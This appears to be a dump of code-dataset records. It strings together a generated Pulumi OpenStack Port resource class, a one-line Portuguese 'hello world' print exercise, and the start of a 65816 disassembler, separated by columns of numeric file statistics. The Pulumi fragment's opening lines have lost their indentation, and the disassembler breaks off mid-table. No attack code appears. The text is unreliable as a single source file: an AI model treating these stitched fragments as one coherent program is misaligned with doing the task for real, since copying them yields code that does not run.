The region in which to obtain the V2 Networking client.
A Networking client is needed to create a port. If omitted, the
`region` argument of the provider is used. Changing this creates a new
port.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list
of security group IDs to apply to the port. The security groups must be
specified by ID and not name (as opposed to how they are configured with
the Compute Instance).
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of string tags for the port.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> Optional[pulumi.Input[str]]:
        """
        The owner of the port. Required if admin wants
        to create a port for another tenant. Changing this creates a new port.
        """
        return pulumi.get(self, "tenant_id")

    @tenant_id.setter
    def tenant_id(self, value: Optional[pulumi.Input[str]]):
        # Setter: store the new tenant (owner) ID in the property bag.
        pulumi.set(self, "tenant_id", value)
    @property
    @pulumi.getter(name="valueSpecs")
    def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Map of additional options.
        """
        return pulumi.get(self, "value_specs")

    @value_specs.setter
    def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        # Setter: store the map of additional options in the property bag.
        pulumi.set(self, "value_specs", value)
class Port(pulumi.CustomResource):
    """A V2 Neutron port resource managed within OpenStack.

    Generated Pulumi resource class: construction is dispatched by
    ``__init__`` between two overloads (a bundled ``PortArgs`` object, or
    individual keyword arguments) and both paths funnel into
    ``_internal_init``, which registers the resource with the Pulumi engine.
    """

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 admin_state_up: Optional[pulumi.Input[bool]] = None,
                 allowed_address_pairs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortAllowedAddressPairArgs']]]]] = None,
                 binding: Optional[pulumi.Input[pulumi.InputType['PortBindingArgs']]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 device_id: Optional[pulumi.Input[str]] = None,
                 device_owner: Optional[pulumi.Input[str]] = None,
                 dns_name: Optional[pulumi.Input[str]] = None,
                 extra_dhcp_options: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortExtraDhcpOptionArgs']]]]] = None,
                 fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortFixedIpArgs']]]]] = None,
                 mac_address: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 network_id: Optional[pulumi.Input[str]] = None,
                 no_fixed_ip: Optional[pulumi.Input[bool]] = None,
                 no_security_groups: Optional[pulumi.Input[bool]] = None,
                 port_security_enabled: Optional[pulumi.Input[bool]] = None,
                 qos_policy_id: Optional[pulumi.Input[str]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 tenant_id: Optional[pulumi.Input[str]] = None,
                 value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 __props__=None):
        """
        Manages a V2 port resource within OpenStack.

        ## Example Usage
        ### Simple port

        ```python
        import pulumi
        import pulumi_openstack as openstack

        network1 = openstack.networking.Network("network1", admin_state_up=True)
        port1 = openstack.networking.Port("port1",
            admin_state_up=True,
            network_id=network1.id)
        ```
        ### Port with physical binding information

        ```python
        import pulumi
        import pulumi_openstack as openstack

        network1 = openstack.networking.Network("network1", admin_state_up=True)
        port1 = openstack.networking.Port("port1",
            admin_state_up=True,
            binding=openstack.networking.PortBindingArgs(
                host_id="b080b9cf-46e0-4ce8-ad47-0fd4accc872b",
                profile=\"\"\"{
          "local_link_information": [
            {
              "switch_info": "info1",
              "port_id": "Ethernet3/4",
              "switch_id": "12:34:56:78:9A:BC"
            },
            {
              "switch_info": "info2",
              "port_id": "Ethernet3/4",
              "switch_id": "12:34:56:78:9A:BD"
            }
          ],
          "vlan_type": "allowed"
        }
        \"\"\",
                vnic_type="baremetal",
            ),
            device_id="cdf70fcf-c161-4f24-9c70-96b3f5a54b71",
            device_owner="baremetal:none",
            network_id=network1.id)
        ```
        ## Notes
        ### Ports and Instances

        There are some notes to consider when connecting Instances to networks using
        Ports. Please see the `compute.Instance` documentation for further
        documentation.

        ## Import

        Ports can be imported using the `id`, e.g.

        ```sh
         $ pulumi import openstack:networking/port:Port port_1 eae26a3e-1c33-4cc1-9c31-0cd729c438a1
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] admin_state_up: Administrative up/down status for the port
               (must be `true` or `false` if provided). Changing this updates the
               `admin_state_up` of an existing port.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortAllowedAddressPairArgs']]]] allowed_address_pairs: An IP/MAC Address pair of additional IP
               addresses that can be active on this port. The structure is described
               below.
        :param pulumi.Input[pulumi.InputType['PortBindingArgs']] binding: The port binding allows to specify binding information
               for the port. The structure is described below.
        :param pulumi.Input[str] description: Human-readable description of the port. Changing
               this updates the `description` of an existing port.
        :param pulumi.Input[str] device_id: The ID of the device attached to the port. Changing this
               creates a new port.
        :param pulumi.Input[str] device_owner: The device owner of the port. Changing this creates
               a new port.
        :param pulumi.Input[str] dns_name: The port DNS name. Available, when Neutron DNS extension
               is enabled.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortExtraDhcpOptionArgs']]]] extra_dhcp_options: An extra DHCP option that needs to be configured
               on the port. The structure is described below. Can be specified multiple
               times.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortFixedIpArgs']]]] fixed_ips: An array of desired IPs for
               this port. The structure is described below.
        :param pulumi.Input[str] mac_address: The additional MAC address.
        :param pulumi.Input[str] name: Name of the DHCP option.
        :param pulumi.Input[str] network_id: The ID of the network to attach the port to. Changing
               this creates a new port.
        :param pulumi.Input[bool] no_fixed_ip: Create a port with no fixed
               IP address. This will also remove any fixed IPs previously set on a port. `true`
               is the only valid value for this argument.
        :param pulumi.Input[bool] no_security_groups: If set to
               `true`, then no security groups are applied to the port. If set to `false` and
               no `security_group_ids` are specified, then the port will yield to the default
               behavior of the Networking service, which is to usually apply the "default"
               security group.
        :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable
               port security on the port. Port Security is usually enabled by default, so
               omitting argument will usually result in a value of `true`. Setting this
               explicitly to `false` will disable port security. In order to disable port
               security, the port must not have any security groups. Valid values are `true`
               and `false`.
        :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy.
        :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client.
               A Networking client is needed to create a port. If omitted, the
               `region` argument of the provider is used. Changing this creates a new
               port.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list
               of security group IDs to apply to the port. The security groups must be
               specified by ID and not name (as opposed to how they are configured with
               the Compute Instance).
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the port.
        :param pulumi.Input[str] tenant_id: The owner of the port. Required if admin wants
               to create a port for another tenant. Changing this creates a new port.
        :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: PortArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a V2 port resource within OpenStack.

        ## Example Usage
        ### Simple port

        ```python
        import pulumi
        import pulumi_openstack as openstack

        network1 = openstack.networking.Network("network1", admin_state_up=True)
        port1 = openstack.networking.Port("port1",
            admin_state_up=True,
            network_id=network1.id)
        ```
        ### Port with physical binding information

        ```python
        import pulumi
        import pulumi_openstack as openstack

        network1 = openstack.networking.Network("network1", admin_state_up=True)
        port1 = openstack.networking.Port("port1",
            admin_state_up=True,
            binding=openstack.networking.PortBindingArgs(
                host_id="b080b9cf-46e0-4ce8-ad47-0fd4accc872b",
                profile=\"\"\"{
          "local_link_information": [
            {
              "switch_info": "info1",
              "port_id": "Ethernet3/4",
              "switch_id": "12:34:56:78:9A:BC"
            },
            {
              "switch_info": "info2",
              "port_id": "Ethernet3/4",
              "switch_id": "12:34:56:78:9A:BD"
            }
          ],
          "vlan_type": "allowed"
        }
        \"\"\",
                vnic_type="baremetal",
            ),
            device_id="cdf70fcf-c161-4f24-9c70-96b3f5a54b71",
            device_owner="baremetal:none",
            network_id=network1.id)
        ```
        ## Notes
        ### Ports and Instances

        There are some notes to consider when connecting Instances to networks using
        Ports. Please see the `compute.Instance` documentation for further
        documentation.

        ## Import

        Ports can be imported using the `id`, e.g.

        ```sh
         $ pulumi import openstack:networking/port:Port port_1 eae26a3e-1c33-4cc1-9c31-0cd729c438a1
        ```

        :param str resource_name: The name of the resource.
        :param PortArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher between the two @overload signatures above:
        # get_resource_args_opts returns a PortArgs instance when the caller
        # used the args-object form, or None for the kwargs form.
        resource_args, opts = _utilities.get_resource_args_opts(PortArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       admin_state_up: Optional[pulumi.Input[bool]] = None,
                       allowed_address_pairs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortAllowedAddressPairArgs']]]]] = None,
                       binding: Optional[pulumi.Input[pulumi.InputType['PortBindingArgs']]] = None,
                       description: Optional[pulumi.Input[str]] = None,
                       device_id: Optional[pulumi.Input[str]] = None,
                       device_owner: Optional[pulumi.Input[str]] = None,
                       dns_name: Optional[pulumi.Input[str]] = None,
                       extra_dhcp_options: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortExtraDhcpOptionArgs']]]]] = None,
                       fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortFixedIpArgs']]]]] = None,
                       mac_address: Optional[pulumi.Input[str]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       network_id: Optional[pulumi.Input[str]] = None,
                       no_fixed_ip: Optional[pulumi.Input[bool]] = None,
                       no_security_groups: Optional[pulumi.Input[bool]] = None,
                       port_security_enabled: Optional[pulumi.Input[bool]] = None,
                       qos_policy_id: Optional[pulumi.Input[str]] = None,
                       region: Optional[pulumi.Input[str]] = None,
                       security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       tenant_id: Optional[pulumi.Input[str]] = None,
                       value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                       __props__=None):
        # Shared implementation behind both __init__ overloads: validates the
        # options, fills the property bag and registers with the engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            # Pin the provider plugin version when the caller did not set one.
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (no id): build the input property bag.
            # __props__ may only be supplied together with opts.id (lookup).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = PortArgs.__new__(PortArgs)
            __props__.__dict__["admin_state_up"] = admin_state_up
            __props__.__dict__["allowed_address_pairs"] = allowed_address_pairs
            __props__.__dict__["binding"] = binding
            __props__.__dict__["description"] = description
            __props__.__dict__["device_id"] = device_id
            __props__.__dict__["device_owner"] = device_owner
            __props__.__dict__["dns_name"] = dns_name
            __props__.__dict__["extra_dhcp_options"] = extra_dhcp_options
            __props__.__dict__["fixed_ips"] = fixed_ips
            __props__.__dict__["mac_address"] = mac_address
            __props__.__dict__["name"] = name
            # network_id is required unless the resource is being rehydrated
            # from an existing URN.
            if network_id is None and not opts.urn:
                raise TypeError("Missing required property 'network_id'")
            __props__.__dict__["network_id"] = network_id
            __props__.__dict__["no_fixed_ip"] = no_fixed_ip
            __props__.__dict__["no_security_groups"] = no_security_groups
            __props__.__dict__["port_security_enabled"] = port_security_enabled
            __props__.__dict__["qos_policy_id"] = qos_policy_id
            __props__.__dict__["region"] = region
            __props__.__dict__["security_group_ids"] = security_group_ids
            __props__.__dict__["tags"] = tags
            __props__.__dict__["tenant_id"] = tenant_id
            __props__.__dict__["value_specs"] = value_specs
            # Output-only properties: populated by the provider, never by the caller.
            __props__.__dict__["all_fixed_ips"] = None
            __props__.__dict__["all_security_group_ids"] = None
            __props__.__dict__["all_tags"] = None
            __props__.__dict__["dns_assignments"] = None
        super(Port, __self__).__init__(
            'openstack:networking/port:Port',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            admin_state_up: Optional[pulumi.Input[bool]] = None,
            all_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            all_security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            allowed_address_pairs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortAllowedAddressPairArgs']]]]] = None,
            binding: Optional[pulumi.Input[pulumi.InputType['PortBindingArgs']]] = None,
            description: Optional[pulumi.Input[str]] = None,
            device_id: Optional[pulumi.Input[str]] = None,
            device_owner: Optional[pulumi.Input[str]] = None,
            dns_assignments: Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]]] = None,
            dns_name: Optional[pulumi.Input[str]] = None,
            extra_dhcp_options: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortExtraDhcpOptionArgs']]]]] = None,
            fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortFixedIpArgs']]]]] = None,
            mac_address: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            network_id: Optional[pulumi.Input[str]] = None,
            no_fixed_ip: Optional[pulumi.Input[bool]] = None,
            no_security_groups: Optional[pulumi.Input[bool]] = None,
            port_security_enabled: Optional[pulumi.Input[bool]] = None,
            qos_policy_id: Optional[pulumi.Input[str]] = None,
            region: Optional[pulumi.Input[str]] = None,
            security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            tenant_id: Optional[pulumi.Input[str]] = None,
            value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'Port':
        """
        Get an existing Port resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] admin_state_up: Administrative up/down status for the port
               (must be `true` or `false` if provided). Changing this updates the
               `admin_state_up` of an existing port.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] all_fixed_ips: The collection of Fixed IP addresses on the port in the
               order returned by the Network v2 API.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] all_security_group_ids: The collection of Security Group IDs on the port
               which have been explicitly and implicitly added.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the port, which have been
               explicitly and implicitly added.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortAllowedAddressPairArgs']]]] allowed_address_pairs: An IP/MAC Address pair of additional IP
               addresses that can be active on this port. The structure is described
               below.
        :param pulumi.Input[pulumi.InputType['PortBindingArgs']] binding: The port binding allows to specify binding information
               for the port. The structure is described below.
        :param pulumi.Input[str] description: Human-readable description of the port. Changing
               this updates the `description` of an existing port.
        :param pulumi.Input[str] device_id: The ID of the device attached to the port. Changing this
               creates a new port.
        :param pulumi.Input[str] device_owner: The device owner of the port. Changing this creates
               a new port.
        :param pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]] dns_assignments: The list of maps representing port DNS assignments.
        :param pulumi.Input[str] dns_name: The port DNS name. Available, when Neutron DNS extension
               is enabled.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortExtraDhcpOptionArgs']]]] extra_dhcp_options: An extra DHCP option that needs to be configured
               on the port. The structure is described below. Can be specified multiple
               times.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PortFixedIpArgs']]]] fixed_ips: An array of desired IPs for
               this port. The structure is described below.
        :param pulumi.Input[str] mac_address: The additional MAC address.
        :param pulumi.Input[str] name: Name of the DHCP option.
        :param pulumi.Input[str] network_id: The ID of the network to attach the port to. Changing
               this creates a new port.
        :param pulumi.Input[bool] no_fixed_ip: Create a port with no fixed
               IP address. This will also remove any fixed IPs previously set on a port. `true`
               is the only valid value for this argument.
        :param pulumi.Input[bool] no_security_groups: If set to
               `true`, then no security groups are applied to the port. If set to `false` and
               no `security_group_ids` are specified, then the port will yield to the default
               behavior of the Networking service, which is to usually apply the "default"
               security group.
        :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable
               port security on the port. Port Security is usually enabled by default, so
               omitting argument will usually result in a value of `true`. Setting this
               explicitly to `false` will disable port security. In order to disable port
               security, the port must not have any security groups. Valid values are `true`
               and `false`.
        :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy.
        :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client.
               A Networking client is needed to create a port. If omitted, the
               `region` argument of the provider is used. Changing this creates a new
               port.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list
               of security group IDs to apply to the port. The security groups must be
               specified by ID and not name (as opposed to how they are configured with
               the Compute Instance).
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the port.
        :param pulumi.Input[str] tenant_id: The owner of the port. Required if admin wants
               to create a port for another tenant. Changing this creates a new port.
        :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options.
        """
        # Force opts.id so the engine performs a read of existing state
        # rather than creating a new resource.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _PortState.__new__(_PortState)
        __props__.__dict__["admin_state_up"] = admin_state_up
        __props__.__dict__["all_fixed_ips"] = all_fixed_ips
        __props__.__dict__["all_security_group_ids"] = all_security_group_ids
        __props__.__dict__["all_tags"] = all_tags
        __props__.__dict__["allowed_address_pairs"] = allowed_address_pairs
        __props__.__dict__["binding"] = binding
        __props__.__dict__["description"] = description
        __props__.__dict__["device_id"] = device_id
        __props__.__dict__["device_owner"] = device_owner
        __props__.__dict__["dns_assignments"] = dns_assignments
        __props__.__dict__["dns_name"] = dns_name
        __props__.__dict__["extra_dhcp_options"] = extra_dhcp_options
        __props__.__dict__["fixed_ips"] = fixed_ips
        __props__.__dict__["mac_address"] = mac_address
        __props__.__dict__["name"] = name
        __props__.__dict__["network_id"] = network_id
        __props__.__dict__["no_fixed_ip"] = no_fixed_ip
        __props__.__dict__["no_security_groups"] = no_security_groups
        __props__.__dict__["port_security_enabled"] = port_security_enabled
        __props__.__dict__["qos_policy_id"] = qos_policy_id
        __props__.__dict__["region"] = region
        __props__.__dict__["security_group_ids"] = security_group_ids
        __props__.__dict__["tags"] = tags
        __props__.__dict__["tenant_id"] = tenant_id
        __props__.__dict__["value_specs"] = value_specs
        return Port(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="adminStateUp")
    def admin_state_up(self) -> pulumi.Output[bool]:
        """
        Administrative up/down status for the port
        (must be `true` or `false` if provided). Changing this updates the
        `admin_state_up` of an existing port.
        """
        return pulumi.get(self, "admin_state_up")

    @property
    @pulumi.getter(name="allFixedIps")
    def all_fixed_ips(self) -> pulumi.Output[Sequence[str]]:
        """
        The collection of Fixed IP addresses on the port in the
        order returned by the Network v2 API.
        """
        return pulumi.get(self, "all_fixed_ips")

    @property
    @pulumi.getter(name="allSecurityGroupIds")
    def all_security_group_ids(self) -> pulumi.Output[Sequence[str]]:
        """
        The collection of Security Group IDs on the port
        which have been explicitly and implicitly added.
        """
        return pulumi.get(self, "all_security_group_ids")

    @property
    @pulumi.getter(name="allTags")
    def all_tags(self) -> pulumi.Output[Sequence[str]]:
        """
        The collection of tags assigned on the port, which have been
        explicitly and implicitly added.
        """
        return pulumi.get(self, "all_tags")

    @property
    @pulumi.getter(name="allowedAddressPairs")
    def allowed_address_pairs(self) -> pulumi.Output[Optional[Sequence['outputs.PortAllowedAddressPair']]]:
        """
        An IP/MAC Address pair of additional IP
        addresses that can be active on this port. The structure is described
        below.
        """
        return pulumi.get(self, "allowed_address_pairs")

    @property
    @pulumi.getter
    def binding(self) -> pulumi.Output['outputs.PortBinding']:
        """
        The port binding allows to specify binding information
        for the port. The structure is described below.
        """
        return pulumi.get(self, "binding")

    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        Human-readable description of the port. Changing
        this updates the `description` of an existing port.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter(name="deviceId")
    def device_id(self) -> pulumi.Output[str]:
        """
        The ID of the device attached to the port. Changing this
        creates a new port.
        """
        return pulumi.get(self, "device_id")

    @property
    @pulumi.getter(name="deviceOwner")
    def device_owner(self) -> pulumi.Output[str]:
        """
        The device owner of the port. Changing this creates
        a new port.
        """
        return pulumi.get(self, "device_owner")

    @property
    @pulumi.getter(name="dnsAssignments")
    def dns_assignments(self) -> pulumi.Output[Sequence[Mapping[str, Any]]]:
        """
        The list of maps representing port DNS assignments.
        """
        return pulumi.get(self, "dns_assignments")

    @property
    @pulumi.getter(name="dnsName")
    def dns_name(self) -> pulumi.Output[str]:
        """
        The port DNS name. Available, when Neutron DNS extension
        is enabled.
        """
        return pulumi.get(self, "dns_name")

    @property
    @pulumi.getter(name="extraDhcpOptions")
    def extra_dhcp_options(self) -> pulumi.Output[Optional[Sequence['outputs.PortExtraDhcpOption']]]:
        """
        An extra DHCP option that needs to be configured
        on the port. The structure is described below. Can be specified multiple
        times.
        """
        return pulumi.get(self, "extra_dhcp_options")

    @property
    @pulumi.getter(name="fixedIps")
    def fixed_ips(self) -> pulumi.Output[Optional[Sequence['outputs.PortFixedIp']]]:
        """
        An array of desired IPs for
        this port. The structure is described below.
        """
        return pulumi.get(self, "fixed_ips")

    @property
    @pulumi.getter(name="macAddress")
    def mac_address(self) -> pulumi.Output[str]:
        """
        The additional MAC address.
        """
        return pulumi.get(self, "mac_address")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Name of the DHCP option.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="networkId")
    def network_id(self) -> pulumi.Output[str]:
        """
        The ID of the network to attach the port to. Changing
        this creates a new port.
        """
        return pulumi.get(self, "network_id")

    @property
    @pulumi.getter(name="noFixedIp")
    def no_fixed_ip(self) -> pulumi.Output[Optional[bool]]:
        """
        Create a port with no fixed
        IP address. This will also remove any fixed IPs previously set on a port. `true`
        is the only valid value for this argument.
        """
        return pulumi.get(self, "no_fixed_ip")

    @property
    @pulumi.getter(name="noSecurityGroups")
    def no_security_groups(self) -> pulumi.Output[Optional[bool]]:
        """
        If set to
        `true`, then no security groups are applied to the port. If set to `false` and
        no `security_group_ids` are specified, then the port will yield to the default
        behavior of the Networking service, which is to usually apply the "default"
        security group.
        """
        return pulumi.get(self, "no_security_groups")

    @property
    @pulumi.getter(name="portSecurityEnabled")
    def port_security_enabled(self) -> pulumi.Output[bool]:
        """
        Whether to explicitly enable or disable
        port security on the port. Port Security is usually enabled by default, so
        omitting argument will usually result in a value of `true`. Setting this
        explicitly to `false` will disable port security. In order to disable port
        security, the port must not have any security groups. Valid values are `true`
        and `false`.
        """
        return pulumi.get(self, "port_security_enabled")

    @property
    @pulumi.getter(name="qosPolicyId")
    def qos_policy_id(self) -> pulumi.Output[str]:
        """
        Reference to the associated QoS policy.
        """
        return pulumi.get(self, "qos_policy_id")

    @property
    @pulumi.getter
    def region(self) -> pulumi.Output[str]:
        """
        The region in which to obtain the V2 Networking client.
        A Networking client is needed to create a port. If omitted, the
        `region` argument of the provider is used. Changing this creates a new
        port.
        """
        return pulumi.get(self, "region")

    @property
    @pulumi.getter(name="securityGroupIds")
    def security_group_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A list
        of security group IDs to apply to the port. The security groups must be
        specified by ID and not name (as opposed to how they are configured with
        the Compute Instance).
        """
        return pulumi.get(self, "security_group_ids")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A set of string tags for the port.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> pulumi.Output[str]:
        """
        The owner of the port. Required if admin wants
        to create a port for another tenant. Changing this creates a new port.
        """
        return pulumi.get(self, "tenant_id")

    @property
    @pulumi.getter(name="valueSpecs")
    def value_specs(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
        """
        Map of additional options.
        """
        return pulumi.get(self, "value_specs")
| 45.692159
| 165
| 0.64118
| 8,796
| 71,097
| 4.992269
| 0.038313
| 0.097695
| 0.087402
| 0.05067
| 0.957347
| 0.948898
| 0.940495
| 0.934323
| 0.928334
| 0.911437
| 0
| 0.003653
| 0.260799
| 71,097
| 1,555
| 166
| 45.721543
| 0.83189
| 0.388061
| 0
| 0.854817
| 1
| 0
| 0.1115
| 0.027111
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16825
| false
| 0.001357
| 0.009498
| 0
| 0.279512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
833b361d2310f0866d5395b249fd04e9da83e551
| 37
|
py
|
Python
|
exercicios/ex001.py
|
CinatitBR/exercicios-phyton
|
16d9c14a83c9dbd6f7bda5477d665848bcd91184
|
[
"MIT"
] | null | null | null |
exercicios/ex001.py
|
CinatitBR/exercicios-phyton
|
16d9c14a83c9dbd6f7bda5477d665848bcd91184
|
[
"MIT"
] | null | null | null |
exercicios/ex001.py
|
CinatitBR/exercicios-phyton
|
16d9c14a83c9dbd6f7bda5477d665848bcd91184
|
[
"MIT"
] | null | null | null |
print('\033[1;32mOlá, Mundo!\033[m')
| 18.5
| 36
| 0.648649
| 7
| 37
| 3.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.257143
| 0.054054
| 37
| 1
| 37
| 37
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0.72973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
834115aa347779611de8c26771c2ebd56488d0cc
| 10,963
|
py
|
Python
|
py65816/db_disassembler.py
|
tmr4/py65816
|
00d9a378ebd0e27378c8ce9e6611a7fec0020b44
|
[
"BSD-3-Clause"
] | 1
|
2022-02-22T18:04:26.000Z
|
2022-02-22T18:04:26.000Z
|
py65816/db_disassembler.py
|
tmr4/py65816
|
00d9a378ebd0e27378c8ce9e6611a7fec0020b44
|
[
"BSD-3-Clause"
] | null | null | null |
py65816/db_disassembler.py
|
tmr4/py65816
|
00d9a378ebd0e27378c8ce9e6611a7fec0020b44
|
[
"BSD-3-Clause"
] | null | null | null |
from py65.disassembler import Disassembler
class dbDisassembler(Disassembler):
    """Disassembler for the 65816, extending py65's base ``Disassembler``
    with the additional 65816 addressing modes.

    Formatting helpers (``addrFmt``, ``byteFmt``, ``byteWidth``, ``byteMask``,
    ``addrMask``) are inherited from the base class.  The repeated
    operand-fetch/format branches of the original implementation are
    consolidated into the dispatch tables below (resolving the original
    in-code TODO about duplicated branches).
    """

    # Modes with a one-byte operand at pc+1 (instruction length 2).
    # mode -> (operand template, default-label template).  The default-label
    # template is applied to the byteFmt-formatted operand when the address
    # parser has no label for it (e.g. '($%s)' for the zpi/dpi modes).
    _BYTE_MODES = {
        'iny': (' (%s),Y', '$%s'),
        'inx': (' (%s,X)', '$%s'),
        'zpi': (' %s', '($%s)'),
        'zpg': (' %s', '$%s'),
        'zpx': (' %s,X', '$%s'),
        'zpy': (' %s,Y', '$%s'),
        # 65816-specific direct-page and stack-relative modes
        'dpg': (' %s', '$%s'),
        'dpx': (' %s,X', '$%s'),
        'dpy': (' %s,Y', '$%s'),
        'dix': (' (%s,X)', '$%s'),
        'dpi': (' %s', '($%s)'),
        'dil': (' %s', '[$%s]'),
        'diy': (' (%s),Y', '$%s'),
        'dly': (' [%s],Y', '$%s'),
        'str': (' %s,S', '$%s'),
